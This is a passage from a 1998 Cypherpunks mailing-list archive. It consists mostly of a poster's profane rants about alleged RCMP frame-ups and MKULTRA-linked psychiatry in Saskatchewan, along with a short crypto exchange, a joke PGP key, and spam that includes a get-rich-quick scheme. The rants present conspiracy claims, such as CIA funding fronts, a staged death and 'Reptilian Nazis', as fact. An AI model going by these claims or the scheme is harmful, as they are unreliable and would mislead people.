members all the way to their pelvis, and dripping down off thier
balls into their rubber boots.
  And the shit would smell an awful lot like mine...

  The Official Story was that, after performing a search of my
apartment, and finding nothing, the RCMP returned with members
of the force who were more 'experienced' in this area, who, lo 
and behold, found a single joint in a suit-jacket pocket.
  I was charged with possession of marijuana.

  Tiny, a member of the Apollos Motorcycle Club in Regina, who Frank
had travelled into town with, had apparently told Frank to 'fuck off'
when asked to introduce him to individuals throughout the province,
with Frank paying travelling expenses and providing spending money
during the trips. Tiny was willing to testify in court as to Franks
apparent instigation of illegal activities on behalf of some entity
who seemed to be funding him.
  A few days before the trial, we were pulled over by the Mounties,
who took Tiny into their police car to have a chat with him. Upon
his return, Tiny told me that it was suggested to him that if I got
off on the charge, that they would have to find someone else to take
the fall, and that he was next in line. Tiny assured me that he would
still be there for the trial.
  Bye, Tiny...

  In order to convict me of possession of a single joint, the RCMP
sent two Mounties to my hometown for a week or so to investigate me,
as well as contacting everyone I have known since birth.
  Although my lawyer had assured me that the case would undoubtedly
be thrown out of court as a result of the RCMP's tacit admission
that a wide variety of individuals had been seen coming and going
from my apartment between the first and second searches (while I
was still in jail), I was convicted, receiving a criminal record
and a $ 300.00 fine (at a time when other people were getting $ 50.00
fines and conditional discharges--no criminal record).

  Being a well-programmed True Believer in Truth, Justice, The Flag,
The National Anthem, Dudley DoRight, Mom's Apple Pie, ad infinituum,
it took me quite a while to fully understand that I had been screwed,
blued and tattoo'd for the crime of...seeing something that I wasn't
meant to see.


  Those who have found themselves subjected to my insane, inane,
wild-eyed rants on the CypherPunks Disturbed Male LISP might be
surprised to know that I didn't, at the time, get 'a bit out of
line,' as <chrisharwig@hetnent.nl> might say.
  As a matter of fact, I pretty much retained my naievity, somehow
convincing myself that this event in my life obviously had to be
some kind of aberration of TheWayThingsAre (TM), or that the RCMP
detachment in orkton had been taken over and subverted by the
Body Snatchers, and that I should just mark it all up to having a
BadHairDay.
 {I have not come by my cynicism easily, having had it pounded into
  me over the course of the years by a variety of members of our
  Officially Recognized Authorities who deemed that, once I had
  become an OfficiallyLabledBadGuy, I was fair game for anyone who
  was in need of 'someone doing something dirty, decent folks can
  frown on.'}

  Although I will freely admit that I remained, for the time being,
an ignorant, well-programmed middle-class Canadian white boy, I am
rather proud of the fact that I showed a spark of future promise as
an individual capable of evolving into AManWorthyOfBeingCalledAMan,
as Gurdjieff would say, by listening to the voice inside which told
me that there was a line I could not cross and still retain any
semblance of integrity and self-respect.
  I could not, in good conscience, allow these thieves to take my
hard earned money, in payment of the court-ordered fine.

  I was met, after my conviction, on the steps of the courhouse, by
a group of local teenagers, most of whom I did not know, who were
aware that I had never smoked a joint in my life, and had decided
that if I had to do the time, I might as well do the crime.
  The first joint I ever smoked was on the courthouse steps in 
orkton, Saskatchewan, after having been railroaded into a criminal
conviction in order to prevent my being in a position to speak out
about my inadvertantly gained knowledge of RCMP malefeasance.
  The first pound of weed I ever bought was in a public park in
Edmonton, Alberta, which I sold in orkton, Saskatchewan, in order
to pay a fine that resulted for conviction of possession of a drug
I had not only never before done, but had never before seen.

  So, Constable McClean and Corporal Esau, swear out some new 
warrants and take me to court. I've already confessed...

Sincerely,
Mr. BigFuckou
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 20 Jul 1998 17:14:02 -0700 (PDT)
To: "Kawika Daguio" <rdl@mit.edu
Subject: Re: 3DES weak because DES falls to brute-force? (was Re: John Gilmore...)
In-Reply-To: <s5b36475.037@aba.com>
Message-ID: <v04003a00b1d97c5aa787@[24.234.31.56]>
MIME-Version: 1.0
Content-Type: text/plain


>One of the reasons we so aggressively pursued the negotiations over export
>control with the Administration and have pushed the AES, and our PKI is
>the collateral damage from the export control legislative debate.   When
>the AES is finalized it will be followed closely by  an ANSI X9 standard.
>Once these standards and infrastructure are established, the concerns
>about brute force attacks should be largely behind us.

I think it likely, biological computation based brute force attacks will be
available much sooner than many think.

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Craz8Grl@aol.com
Date: Mon, 20 Jul 1998 16:21:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: please respond
Message-ID: <aae8679.35b3c56d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello:
 My name is Enisa, I'm 13 years old. I write an online e-zine that for teens.
We have over 150+ members. We just started a few days ago. We are looking for
sponsors to sponsor our contests. These are some of the things we are able to
do for you...
 * A banner on our page
 * Repeated mentioning in our newsletters
 * And anything else that you would like
 These are the things I would like in return:
 *2-3 prizes for our contest
 And nothing more.
 If you are interested please e-mail me
so we can discuss this further.
Please respond.
 Thank you for your time. 
 Sincerely, 
 Enisa
<A HREF="http://members.aol.com/Craz8Grl/">http://members.aol.com/Craz8Grl/
</A>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LrdWill@aol.com
Date: Mon, 20 Jul 1998 16:27:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: you got that PGP program?
Message-ID: <99c9c87.35b3d24d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


you got it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Your Yashy" <cons0005@*algonquinc.on.ca>
Date: Mon, 20 Jul 1998 17:42:21 -0700 (PDT)
To: "kryz" <chrisharwig@hetnet.nl>
Subject: Re:
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <199807210042.UAA17311@deathstar.comnet.ca>
MIME-Version: 1.0
Content-Type: text/plain


Priority:       	Normal
To:             	"Ciferpunx" <cypherpunks@toad.com>
From:           	"kryz" <chrisharwig@hetnet.nl>
Date sent:      	Tue, 21 Jul 98 00:12:26 -0000 (DST)

> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2i
> 
> s0mepeOplEarErEtarDeDanDsomeUsEtHeirHeAdD8ol2NI3s5E9ftasLOs0NBckLFwiHsZW
> 9ogW6D+/Y7Uyx+dIGf45Fv6XTIjuMCIhvO44sg2QR84chTuHgrv2yRm2da9FcZUm
> 6yM7dBk0iCJuj/nvtTXUZ/hT3X/6CUBr/9PyzvquECNqYX8ALmczfReY6s/SF4jA
> zReU9IjbbX05MUDzMiNL54BrT71p4fZ+25oBDuzqZl8hRmVx16CjgxrEDbXoJZPU
> ojTX/kNsQ60XZzIaww5eQS6p19TFIXt4op3lq8vBsieaLjzjdVjQsU3I4eR5J1z/
> Prp7836tlAggO3dbJflY3Ah1dB+oDTFb1ulR9BEABRGwAYe0G0NocmlzIEhhcndp
> ZyBTYWxvcGV0dGUgMjUxMbABAw==
> =mTz7
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 
> 
> 


HTTP://www.comnet.ca/~yashy
100 YashDollars to first person to try every link.
(including links derived from links)
p.s. SPAM PROOF Email address. Remove the "*" to reply.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: new7898@yahoo.com
Date: Mon, 20 Jul 1998 11:59:44 -0700 (PDT)
To: new71398@hotmail.com
Subject: NEED MONEY NOW
Message-ID: <74019590_23312217>
MIME-Version: 1.0
Content-Type: text/plain



THIS IS THE ONE!!!

NEED MONEY NOW??	

Turn a one time $39 investment into
a steady stream of $20 bills paid 
directly to you, each and every 
Friday for the rest of your life!!
(START NOW AND HAVE A CHECK IN YOUR 
HAND NEXT FRIDAY)

NO SELLING INVOLVED!

No stocking merchandise or inventory
of any kind! Could you advertise a 
TOLL FREE number? That's all there is 
to it. Our system does everything else
for you! SO SIMPLE A CHILD COULD DO IT!

Why not call and see for yourself?!
(Be sure and have a pen and paper handy)

$$1-800-368-3561$$
(24 hours)
USE ID # 18266






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eliner@departs.co.il
Date: Wed, 22 Jul 1998 11:53:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: De'Parts - The Parts locating highway...
Message-ID: <199807202200.PAA16669@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



To:      General Manager.
           Purchasing Director
           Marketing Director.


Re: Boost your sales to High-Tech industries.


Dear Sir/Madam;


*      If you need to find parts or stock as fast as possible...                                You need De'Parts.

*      If you are looking to sell surplus parts or stock (in bulk)...                            You need De'Parts.

*      If you are a manufacturer or a distributor and you want to boost sales...     You need De'Parts.

Share your database with others, and join the De'Parts family at:
                                                                                                                  WWW.DEPARTS.COM
            **********************************************
De'Parts is an Internet-based information services center that provides an inventory database to potential buyers and suppliers of industrial products.

De'Parts enables you to publish and locate parts at the stroke of a key.

Both supply and demand are met at the De'Parts site, where all parties can find exactly what they need.

Your parts or surplus stock could be just the solution for someone else's needs.

De'Parts will help reduce your costs, improve inventory control and save valuable storage space.

All members of the De'Parts network are able, free of charge:

*      To search our database; 
*      To use our Email robot;
*      To submit Requests for Quotations (RFQ's); and 
*      To download files.

Publishing members can advertise an unlimited number of parts or lists of stock, on our database for the benefit of all De'Parts site visitors.

Publishing membership costs less than the price of an advertisement in your local newspaper.

Just follow the steps below and you are on your way to a substantial increase in sales:

1. Log in to De'Parts and Register to the system. Be aware if
    You want to sale all your stock as a batch or to sell it Part
    by Part (It means that you may have to provide a quotation for
    each part).

2. Create a file to publish, include all your parts for sale, and
    follow the instructions that describe how to "Upload a File" in 
    "Manage D.B.".

3. Upload your file to the system (Step 1 - to Publish the file
    as a batch. Step 2 - To publish and quote each part).

4.  Check your Email frequently.

For detailed information, please read the "About" section at: WWW.DEPARTS.COM

Thank you for your time and we hope that you enjoy the advantages provided by our system.

Wishing you a lot of success,




S. Avishai

V.P. Marketing
   De'Parts


-------------------------------------------------------------------------------------------------
   ***   Take a part in De'Parts...the parts locating highway   ***
-------------------------------------------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marketing@departs.co.il (Marketing Dept.)
Date: Mon, 20 Jul 1998 17:44:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: De'Parts - The Parts locating highway...
Message-ID: <19980720221402671.AAA450@www.departs.co.il@departs.co.il>
MIME-Version: 1.0
Content-Type: text/plain



To:      General Manager.
           Purchasing Director
           Marketing Director.


Re: Boost your sales to High-Tech industries.


Dear Sir/Madam;


*      If you need to find parts or stock as fast as possible...                                You need De'Parts.

*      If you are looking to sell surplus parts or stock (in bulk)...                            You need De'Parts.

*      If you are a manufacturer or a distributor and you want to boost sales...     You need De'Parts.

Share your database with others, and join the De'Parts family at:
                                                                                                                  WWW.DEPARTS.COM
            **********************************************
De'Parts is an Internet-based information services center that provides an inventory database to potential buyers and suppliers of industrial products.

De'Parts enables you to publish and locate parts at the stroke of a key.

Both supply and demand are met at the De'Parts site, where all parties can find exactly what they need.

Your parts or surplus stock could be just the solution for someone else's needs.

De'Parts will help reduce your costs, improve inventory control and save valuable storage space.

All members of the De'Parts network are able, free of charge:

*      To search our database; 
*      To use our Email robot;
*      To submit Requests for Quotations (RFQ's); and 
*      To download files.

Publishing members can advertise an unlimited number of parts or lists of stock, on our database for the benefit of all De'Parts site visitors.

Publishing membership costs less than the price of an advertisement in your local newspaper.

Just follow the steps below and you are on your way to a substantial increase in sales:

1. Log in to De'Parts and Register to the system. Be aware if
    You want to sale all your stock as a batch or to sell it Part
    by Part (It means that you may have to provide a quotation for
    each part).

2. Create a file to publish, include all your parts for sale, and
    follow the instructions that describe how to "Upload a File" in 
    "Manage D.B.".

3. Upload your file to the system (Step 1 - to Publish the file
    as a batch. Step 2 - To publish and quote each part).

4.  Check your Email frequently.

For detailed information, please read the "About" section at: WWW.DEPARTS.COM

Thank you for your time and we hope that you enjoy the advantages provided by our system.

Wishing you a lot of success,




S. Avishai

V.P. Marketing
   De'Parts


-------------------------------------------------------------------------------------------------
   ***   Take a part in De'Parts...the parts locating highway   ***
-------------------------------------------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marketing@departs.co.il (Marketing Dept.)
Date: Mon, 20 Jul 1998 17:44:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: De'Parts - The Parts locating highway...
Message-ID: <19980720221916421.AAA603@www.departs.co.il@departs.co.il>
MIME-Version: 1.0
Content-Type: text/plain



To:      General Manager.
           Purchasing Director
           Marketing Director.


Re: Boost your sales to High-Tech industries.


Dear Sir/Madam;


*      If you need to find parts or stock as fast as possible...                                You need De'Parts.

*      If you are looking to sell surplus parts or stock (in bulk)...                            You need De'Parts.

*      If you are a manufacturer or a distributor and you want to boost sales...     You need De'Parts.

Share your database with others, and join the De'Parts family at:
                                                                                                                  WWW.DEPARTS.COM
            **********************************************
De'Parts is an Internet-based information services center that provides an inventory database to potential buyers and suppliers of industrial products.

De'Parts enables you to publish and locate parts at the stroke of a key.

Both supply and demand are met at the De'Parts site, where all parties can find exactly what they need.

Your parts or surplus stock could be just the solution for someone else's needs.

De'Parts will help reduce your costs, improve inventory control and save valuable storage space.

All members of the De'Parts network are able, free of charge:

*      To search our database; 
*      To use our Email robot;
*      To submit Requests for Quotations (RFQ's); and 
*      To download files.

Publishing members can advertise an unlimited number of parts or lists of stock, on our database for the benefit of all De'Parts site visitors.

Publishing membership costs less than the price of an advertisement in your local newspaper.

Just follow the steps below and you are on your way to a substantial increase in sales:

1. Log in to De'Parts and Register to the system. Be aware if
    You want to sale all your stock as a batch or to sell it Part
    by Part (It means that you may have to provide a quotation for
    each part).

2. Create a file to publish, include all your parts for sale, and
    follow the instructions that describe how to "Upload a File" in 
    "Manage D.B.".

3. Upload your file to the system (Step 1 - to Publish the file
    as a batch. Step 2 - To publish and quote each part).

4.  Check your Email frequently.

For detailed information, please read the "About" section at: WWW.DEPARTS.COM

Thank you for your time and we hope that you enjoy the advantages provided by our system.

Wishing you a lot of success,




S. Avishai

V.P. Marketing
   De'Parts


-------------------------------------------------------------------------------------------------
   ***   Take a part in De'Parts...the parts locating highway   ***
-------------------------------------------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 20 Jul 1998 17:57:26 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: World Exclusive: I was a lesbo virgin/Bigger balls are better
Message-ID: <19980720234547.27548.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/20/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Tue, 21 Jul 1998 00:08:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Canadian Shock Radio - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C97C4.5E586D60.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Canadian Shock Radio - SPACE ALIENS HIDE M DRUGS!!!
____________________________________________________

  Lest anyone think that my rendidion of 'Dudley's Dick In D-Sharp"
might be a bit of sour grapes on my part, let me state, for the record,
that I hold no ill will against the poor, ignorant Nazis in the orkton
division of the RCMP, since basically all they really did was to totally
fuck up their own Karma, while giving me a valuable life-lesson which
may well have been responsible for my making a very important and far-
reaching decision later in my life.
  ears later, as a result of knowing what awaits TheManWhoKnowsTooMuch
I decided to keep my fucking mouth shut about the people and events that
I observed from my position on the ceiling, while looking down on my 
body and the rest of the room during a particularly intensive electro-
shock experience. 
  Something told me that I was, once again, inadvertently observing
something that would result in 'measures' needing to be taken by the
RecognizedAndRespectedMembersOfSociety (of which I was not one), in 
order to ensure that I did not share with others what I had seen while
peeking under the skirt of the GreatWhoreWhoWasWearingNoPanties.

  One of the more disturbing things I perceived while listening to the
rather enlightening conversations taking place among the gathered
civilian and military medical personnel, was something that I have come
to understand rather recently, as a result of research that was begun
after something Tim May mentioned in one of his posts to the CPUNX list.
  I thought it odd, at the time, to observe my being given a long series
of electroshocks in a single session, since it was my understanding that
They (TM) just gave a person one, quick whack, and then hosed the shit
off your sheets and wheeled you into another room to make way for the
next lucky winner. Recent research, however, seems to indicate that
this was a special technique pioneered in Canada by Dr. Ewen Cameron,
MKULTRA's resident wanna-be-Nazi-doctor, in order to wipe his patients'
minds (and identities) 'clean,' in order to prepare them for a rebuilding
of their personality, through a technique called Psychic Driving (which
turns out to be a kindlier, gentler form of Brainwashing--as long as you
are only comparing it to bamboo-shoots under the fingernails and rats
in cages placed over one's face).
  Of course, Dr. Cameron, who retired to great accolade, recognized as
a Titan in Canadian Medical History, as opposed to being tried by an
International Court and sentenced to be hung, like his predecessors at
Dachau, was really only being used as an expendable shill to take the
heat if the shit hit the fan over Rockerfeller Foundation funded CIA/
Military experiments obliterating the minds of women being treated for
such devastating mental disabilities as 'menopause' and 'post-partum
depression.' After all, one could hardly expect the CIA to risk exposure
of the players in the Canadian MKULTRA scene whose pre-WorldWarII alleged
'histories' could not withstand close scrutiny.
  Accordingly, after the shit hit the fan, it was Dr. Cameron who fell
off a cliff while 'climbing' <nod-nod> <wink-wink>, while my physician
continued to practice...and practice...and practice...

  Delving into the history of CIA mind-control experiments cleared up a
few things that had been somewhat of a mystery in regard to my medical
treatment over the years, such as how I had ended up being treated with
hypnosis and heavy doses of electroshock when I had originally gone to
see the doctor in regard to a particularly nasty hangnail, and what the
fuck all of those Navy people were doing two thousand miles from the 
ocean.

  I'm just kidding, of course...
  The fact is, I *already* knew *what* the fuck all of those Navy people
were doing in Saskatchewan. They were there conferring with Dr. Hoffer's
alleged 'research assistant,' MJ. What I *didn't* know, at the time, 
was *why*.
  I was not surprised to recently find out, after a modicum of research,
that Ms. MJ Callbeck left the Navy as a nurse lieutenant, specializing
in psychiatric nursing, receiving most of her postgraduate training at
Allan Memorial Hospital in Montreal, from phychiatrists who were, to
put it as delicately as possible...PostWar Refugees From Hitler's Nazi
Germany. (With 'refugee' apparently being defined as a physician who
had escaped trial and hanging at Nuremburg, as a result of having a
wealth of information and 'practical experience' in areas that were of
interest to American and Canadian intelligence agencies.)

  Ms. Callbeck became a 'research nurse' for a research team formed in
Saskatchewan with huge grant from the CIA's Canadian funding front,
the Rockerfeller Foundation, and was awarded a training grant to
visit two U.S. research units funded by the CIA's American funding
front, the Human Ecology Foundation, at Tulane University, in New
Orleans, and the Psychiatric Institute in New ork.
  After MJ's return from the HeartOfMentalDarkness of the MKULTRA
mind-control establishments in the U.S., she created a psychiatric
researching nursing team to 'control' all clinical research for the
team, and to ensure that research protocols would be followed.

  Ms. Callbeck's and Dr. Hoffer's careers were closely intertwined with
Dr. Humphry Osmond, a British Naval doctor sent to Canada to look after
British Naval Intelligence's interests in the North American mind-control
research arena being fronted by the CIA, with their MKULTRA Project, and
Captain Al Hubbard, the Johnny Appleseed of LSD, whose hallucinogenic
pecker-tracks throughout the OSS and the Manhattan Project led to him
receiving a Presidential Pardon from Harry Truman, as well as opening
doors for him to a wide variety of employment with such agencies as the
CIA and the Canadian Special Services.
  As a matter of fact, the chronolgy of the U.S. mind-control experiments
moving beyond U.S. borders, to countries such as Canada, when publicity
and legal technicalities (such as the murder of innocent victims who had
been dosed with hallucinogenic drugs without their knowledge) became a
bit of a 'sticky wicket,' was mirrored in Canada by the careers of Hoffer,
Osmond, Callbeck and Hubbard, who seemed to be at the center of much
of the 'progressive' psychiatric research funded by American and Canadian
military intelligence agencies, but who always managed to somehow exit 
the scene just before the shit hit the fan, and, as a result, "not get 
any fon 'em."
{e.g. - Just as Hubbard (who looks surprisingly like my step-grandfather,
 Ray Hubbard) managed to slip out the back door of the Hollywood Hospital
in Vancouver, just as "the Canadian Medical Association was becoming
increasingly suspicious of Hollywood Hospital in the wake of publicity
surrounding MK-ULTRA" (with the Canadian Citizen's Commission on Human
Rights doing a distincly audible "Hhhmmmm..." over discovering a CIA
contract psychiatrist, Dr. Harold Abramson, being on the Board Of 
Directors of the hospital superintendent's Psychedelic Therapy Assn.),
Dr. Hoffer always seemed to manage to call a 'slant-right' at the 
exact time that a hole in the line seemed to open up, closing behind
him and leaving the more dispensable players behind to face a legal
and media blitz(krieg) that was more interested in kicking ass and
taking names, than who actually had the ball.

  Naturally, after 1966, when overt legal research into hallucinogenic
therapy was stopped/banned, Dr. Hoffer, who was then Associate Professor
(Research) Psychiatry, College of Medicine, University of Saskatchewan,
suddenly deemed it time to go into 'private practice,' where his work/
research would not be subject to the scrutiny of his peers and his
employers, who might take a dim view of any connection to what was
now illegal research.
  Ms. Callbeck, Navy Lieutenant, MKULTRA research trainee, also found
it a convenient time to depart the Research Unit at the University of
Saskatchewan, and assist Dr. Hoffer in the research he was pursuing.

  As always, what one finds upon inquiry into JustTheFactsMa'am never
seems to be quite as intruiging as what one *does*not* find...

  For instance, one would expect a person who held such an esteemed
position as Director General Technical Assistance, United Nations,
to include this accolade on his or her Curriculum Vitae, but Dr. Hoffer
does not seem to have done so.
  As well, all research into the details of the position seem to lead
nowhere, except when one makes personal inquiries through people who
were involved with closely connected areas of the UN agency at the
time, and, even then, when one begins to ask more detailed questions
about the involvement-of/relationship-with Kurt Waldheim, etc., people's
memories suddenly get much worse, and, by golly it seems that they can't
seem to remember hardly anything at all, and think that maybe they were
mistaken about what they already told you.

  Of course, when one looks under the dustbins of history, one invariably
finds a few dustballs that remain, as a result of someone forgetting to
do a thourough cleaning, and one finds such gems as a letter from The
Commission For The Study Of Creative Imagination, with such notables/
suspects such as Hoffer, Hubbard, Osmond, Huxley. Smythies, on the Board
of Directors (with Hoffer's UN position highlighted), making inquiries 
into the Urantia manuscripts which Hitler's Deaths Head troops found
so enamoring. 
    
"Our little planet, Urantia, is poised on the brink of an enthralling
epoch of social readjustment, moral quickening, and spiritual
enlightenment -- the threshold of true civilization."
{Of particular interest is the lack of any mention of Reptilian Nazis,
 even though it seems to be common knowledge that Jesus descended into
 the bowels of the earth during his three days of being incommunicado.
 Were there 'basement stairs' in his 'burial' cave?}


  Also curiously missing from all references to the history of psychiatry
and/or hallucinogenic mind-control experimentation in Canada is mention
of an individual whose name I encountered many times in Saskatchewan, and
always in relation to communities which contained major mental health
hospitals or facilities--Frank Skanks.

  The above, of course, is just the tip of the iceberg that one discovers
upon doing a bit of research into known and documented human figures in
the history of mental health research and practice in Saskatchewan.
  If one begins investigations into some of the more shadowy figures who
are usually encountered only when viewing their electroshock treatments
from the ceiling above, or by following them from one's doctor's office
and eavesdropping on them during their lunch, etc., then things get, as
Alice noted, "curiouser and curiouser..."

  Stan, you've still got something hanging from your lip...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Tue, 21 Jul 1998 05:14:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I95 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C97EF.202780A0.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


I(95)'m An Asshole - SPACE ALIENS HIDE M DRUGS!!!
__________________________________________________

  Been an asshole all my life...

  I suppose I should keep my obligation to be true to my word and provide
the RCMP with details of my life of crime, in order to help the Canadian
Justice system to compensate for the ignorant incompetence of Canada's
National Internal Police Force.
  I guess it was kind of mean of me to 'confess' to a crime I committed
over a quarter-century ago, on which the Statute Of Limitations has
undoubtedly run out.
  So I'm a belligerant, smart-alec asshole...so sue me!

  Regardless, I feel obligated to give up the Real Goods this time, by
confessing to a more recent crime for which I can undoubtedly be charged,
tried and convicted, without anything remotely resembling True Justice 
standing in the way...
  Get out the warrant and lick your pen, Dudley, because I confess to 
being guilty of none other than...Accessory After The Fact To Grand 
Theft Auto!
  Less than two years ago, nonetheless!
<Mounties across Canada cheer, and throw their hats in the air...>


  Personally, I think that Officer Besalt should get the honour of 
throwing the cuffs on me for this charge, since the actual perpetrator
of the car theft was his good BumBuddyAidsInfestedDrugAddictedInformant,
Ian Wasacase, on whose behalf Officer Besalt, a SorryScumBagPieceOfShit
ThievingPrick (TM) robbed me at gunpoint in full public view, at the
CoalDust Saloon, in Bienfait Saskatchewan.
  RCMP Officer AJ Besalt, a piece of Human Garbage who has the conscience
and intellect of a Slug, not only seems incapable of feeling any sense of
shame in dressing up in his neatly pressed uniform, with his shiny badge
and shoes, and telling a judge, with a straight face, nonetheless, that,
despite his incompetence in being able to produce the proper paperwork
on a DogAtLarge charge that he commanded the plaintiff to appear in court
on, under the threat of armed, physical violence, the case should be
continued, with a new date set, in order for him not to feel like an
incompetent moron for being able to handle a simple DogAtLarge case any
better than he did an attempted DrugBust, ending up having to retrieve
their government informant/agent's DrugBuyFrontMoney at gunpoint from
a citizen who had committed no crime.

  Oh, pardon me...I would hate for anyone to get the *wrong* impression,
here...
  OffalSir Besalt didn't actually mention the part about using a career
criminal and police informant to attempt to frame a disabled person on
a drug charge by using the threat of violence to get him to sell some of
his medication in return for marked money.
  I guess he didn't want to take up the Court's valueable time with
insignificant details.

  Lest the reader believe, Dog forbid, that I am stringing out my sincere
confession in order to torture a poor, pathetic excuse for a human being
by including facts and details that never quite seem to make it into the
Offical Police Reports, I guess I had best get on with supplying the
details of my HeinousCrime.


  I was very young as a child... <hee-hee>

  OK, really, now...

  Ian Wasacase, former preacher <typical, eh?>, had come to Estevan to
bestow his blessed presence on his brother, Gilbert, and his family.
He had driven down with his NewImprovedDrugAddictedOldLady and a couple
of friends who were apparently his apprentices in his life of crime.
  As overjoyed as Gilbert and his wife, Peggy, were to see Gilbert's
beloved brother, Ian, they nonetheless that, in the interest of saving
the life of several single children, their own, that it would be best
if Ian and his SpoonFed Roadies were to depart, and thus not further
endangering the lives of the family's children by shooting their AIDS
infested blood all over the floor, walls and ceiling of the bathroom
and the children's bedrooms.
  In consternation with the difficulty of getting the FamilyJunkie and
friends out of his home, Gilbert offered to pay my expenses to make a
trip to Regina, which he knew I needed to do anyway, in return for
leading his brother to believe that I had a medical prescription that
was waiting for me in Regina, which I would be interested in selling
to pick up a little cash.

  It worked like a charm...
  Ian and the SpoonFed Roadies had their belongings packed and were 
waiting outside, by the vehicles, in 32-seconds flat. (A new world
record!)
  Ian's old lady and two friends climbed into my motorhome, explaining
that the heater in the car they had brought didn't work very well, and
we proceeded down the highway, toward Regina, with me following Ian's
car with my motorhome.

  Well, not exactly...
  It turns out that it wasn't Ian's car. It wasn't his old lady's car.
It wasn't either of his friends' car.
  I pretty much figured that out when he pulled over by the side of the
road, motioning for me to stop, and then turned onto a small snow-filled
side road which received no winter maintenance, and proceeded to put the
pedal to the metal, going up and over a railway crossing, and down the
other side into a deep snowbank where the car would be hidden until spring
thaw. My instincts were further confirmed when he appeared, walking back,
with a hammer, a large screwdriver, and the license plates off the car.

  Did I inform the police of this? Did I turn him in?
  Nope...I'm AnAccessoryAfterTheFact.

  To tell the truth, being AnAccessoryAfterTheFact has, thus far, resulted
in far less jail time than any of the attempts I have made during my life
to provide information and/or assistance to those who are officially sworn
to uphold the law.
  It always seems that those who perpetrate crimes are much more informed
on the legal technicalities regarding crimes and criminal proceedings than
those who happen to be standing nearby with their thumb up their ass,
committing crimes only against themselves.
  In the end, it always seems to end up that the person who murdered a
few hundred babies in their crib gets probation in return for turning
State's Evidence against the person who wanders into the room and says,
"Uuuhhh...I really don't think you should be doing this."

  Cynical? Moi?
  Eat my shorts...I'm talking about Real Life (TM) here, boys and girls,
not about Matlock, OK?

  So, there you have it, Dudley.
  A full confession that can be used to convict me, coming from my own
lips (so to speak, although I actually type with my tongue).
  No longer will you have to haul my ass repeatedly into court in vain
attempts to convict me of crimes of which I am not guilty, as a result
of sloppy investigative work and a propensity to ignore the fact that
your witnesses are lying scumbag sacks of shit who would testify against
their own mothers to get out of their own criminal charges.

[EditWhore's Gnote: Since the confession, per se, is complete, members of
 Royal Canadian Mounted Police may want to forgoe reading the rest of my
 diatribe, since it will merely fill in a few small details regarding
 the incompetent, criminal and unconsionable actions of Officer Besalt.]

  Upon reaching Regina, after the commission of my Heinous Crime of
AnAccessoryAfterTheFactToGrandTheftAuto, I decided that I would drop
the GrandTheftAutoPerpetrator, et al, off at their place of residence,
purporting to go pick up my medications and return, to make my fortune
selling them my medications at outrageously low prices.
  Instead, I seemed to get stuck in the driveway behind their house, even
though the snow was not very deep, and I had little trouble driving in.
  After going in the house to warm up and get a shovel, which it turns 
out they didn't have, Ian took my winter coat to go get a shovel, or some
friends to help, or somesuch. He soon returned without the jacket, without
a shovel, and without any friends. Since it was thirty or forty below zero
and they had no phone, I quickly began to suspect that, since I obviously
wasn't going anywhere, Ian & Company had come to the conclusion that a
bird in the hand is worth two in the bush, and that once they were in
possession of the medication I currently had, then they could look forward
to a bright future in which there might actually be another bird out there
somewhere, in the form of a prescription for further medication.

  Although I would be the last one to heap praise upon Ian for the choices
he has made in his life, neither would I be the first to heap huge amounts
of abuse on him for his character, or lack thereof.
  The reason for this is quite simple...he didn't kill me.

  Ian is a drug addict, with a ferocious habit to feed, and little stength
of character left with which to attempt to avoid falling into total moral
depravity. However, he chose to scam me, steal from me while I slept, and
the like, over the course of several days, instead of just whacking me
